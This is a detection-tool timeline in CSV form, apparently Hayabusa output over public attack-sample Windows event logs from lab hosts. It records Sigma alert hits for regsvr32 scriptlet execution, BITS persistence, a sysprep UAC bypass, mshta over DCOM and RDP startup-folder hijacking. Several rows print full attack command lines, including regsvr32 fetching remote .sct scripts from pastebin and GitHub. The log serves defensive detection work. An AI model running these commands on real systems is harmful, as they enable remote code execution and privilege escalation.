2019-05-13 02:20:49.458 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\system32\calc.exe | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 684 | PGUID: 365ABB72-55F1-5CD8-0000-00103D1E3300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 03:04:50.121 +09:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: backdoor | URL: C:\Windows\system32\cmd.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx
2019-05-13 03:35:05.155 +09:00,IEWIN7,1,info,,Process Created,"Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13eee | PID: 1420 | PGUID: 365ABB72-6759-5CD8-0000-0010E2D50F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:05.780 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | LID: 0x13eee | PID: 1912 | PGUID: 365ABB72-6759-5CD8-0000-001085031000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:06.562 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49165 (IEWIN7..home) | Dst: 104.20.208.21:80 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 1420 | PGUID: 365ABB72-6759-5CD8-0000-0010E2D50F00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,../hayabusa-rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:48:52.219 +09:00,IEWIN7,1,info,,Process Created,"Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | Process: C:\ProgramData\jabber.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13715 | PID: 1340 | PGUID: 365ABB72-6A94-5CD8-0000-00101BDB0E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx
2019-05-13 03:48:52.766 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | LID: 0x13715 | PID: 3880 | PGUID: 365ABB72-6A94-5CD8-0000-0010C2F10E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx
2019-05-13 23:50:59.389 +09:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: hola | URL: C:\Windows\system32\cmd.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx
2019-05-14 03:02:49.160 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mobsync.exe -Embedding | Process: C:\Windows\System32\mobsync.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1341d | PID: 3828 | PGUID: 365ABB72-B147-5CD9-0000-00109D4F0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.681 +09:00,IEWIN7,1,info,,Process Created,Cmd: /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x133de | PID: 2372 | PGUID: 365ABB72-B167-5CD9-0000-0010EE150C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.681 +09:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x1341d | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.895 +09:00,IEWIN7,1,info,,Process Created,Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: /c notepad.exe | LID: 0x133de | PID: 2584 | PGUID: 365ABB72-B167-5CD9-0000-00109D240C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:21.212 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49159 (IEWIN7) | Dst: 151.101.128.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,../hayabusa-rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:05:18.692 +09:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 1188 | PGUID: 365ABB72-B1DE-5CD9-0000-0010715B0D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 09:29:52.744 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:58172 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx
2019-05-14 09:32:22.775 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55099 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx
2019-05-14 09:32:36.775 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55101 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx
2019-05-14 10:29:04.306 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mshta.exe -Embedding | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1070ce | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Evas,MSHTA Spwaned by SVCHOST,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 10:29:05.534 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49168 (IEWIN7) | Dst: 10.0.2.17:55683 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2676 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2676 | PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.359 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 3964 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.359 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 3964 | PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.143 +09:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 288 03573528 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3776 | PGUID: 365ABB72-28D3-5CDA-0000-0010B08B1300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.453 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 1020 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.453 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 1020 | PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.470 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2768 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.470 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2768 | PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.487 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\explorer.exe | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 572 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.487 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 572 | PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.487 +09:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 312 0197CDB0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3388 | PGUID: 365ABB72-28D3-5CDA-0000-001055AD1300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.814 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13545 | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.831 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\cryptbase.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: Yokai Ltd. | Signed: false | Signature: Unavailable | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300 | Hash: SHA1=4DA0DCAD144039F6DD7739E37AB3A7B78FB86B4D,MD5=2BA4BC4753A29D56AA185C972CA1023E,SHA256=A6BE522A1FC48B391EFCB3A3CFE49560A455F1BB853505F7E9ACCA8EDF116B4C,IMPHASH=380A21A3D5988707B0CFE7CA5B1C7E0B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.831 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | LID: 0x13545 | PID: 3976 | PGUID: 365ABB72-28D3-5CDA-0000-001088C71300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 23:03:45.100 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09c49153\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.exe | Process: C:\Windows\system32\mstsc.exe | PID: 2580 | PGUID: ECAD0485-C903-5CDA-0000-0010340F1000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,C2,Hijack Legit RDP Session to Move Laterally,,../hayabusa-rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
2019-05-14 23:04:06.339 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09cc920e\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
2019-05-14 23:04:28.860 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09e09039\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49583 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49584 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
